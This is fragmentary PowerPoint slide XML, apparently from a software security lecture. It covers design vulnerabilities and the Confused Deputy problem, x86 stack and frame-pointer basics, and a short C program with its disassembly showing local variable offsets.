          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="215065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4409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Design Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are flaws in the overall logic of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of authentication and/or authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Erroneous trust assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Confused Deputy problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1524919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Example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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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Garbage</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="276685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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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27318" y="260504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67369" y="5074404"/>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0xFFFC</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839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="215065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168494" y="31139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1850512" y="2858824"/>
            <a:ext cx="230968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7907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animBg="1"/>
      <p:bldP spid="15"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Example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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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Garbage</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51</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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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27318" y="260504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67369" y="5074404"/>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0xFFFC</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839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="23413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168494" y="31139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826220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Example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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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Garbage</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52</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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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27318" y="260504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67369" y="5074404"/>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0xa</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0xFFFC</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839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="23413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168494" y="31139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81338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Example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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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Garbage</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53</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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27318" y="260504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67369" y="5074404"/>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0xa</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0xa</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839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="23413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Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="311398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ight Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="277284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3836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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions would like to use the stack to allocate space for their local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we use the stack pointer for this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, however stack pointer can change throughout program execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame pointer points to the start of the function's frame on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each local variable will be (different) offsets of the frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In x86, frame pointer is called the base pointer, and is stored in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235056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0836" y="1579420"/>
            <a:ext cx="2507673" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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float</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = 10;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  b = 100;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  c = 10.45;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = a + b;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112328" y="1600201"/>
            <a:ext cx="5832763" cy="475615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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a @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 – 0xc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b @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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c @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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a: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esp</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a: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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x8(</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0xc(</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038120" y="1579420"/>
            <a:ext cx="3074208" cy="422686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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a @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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
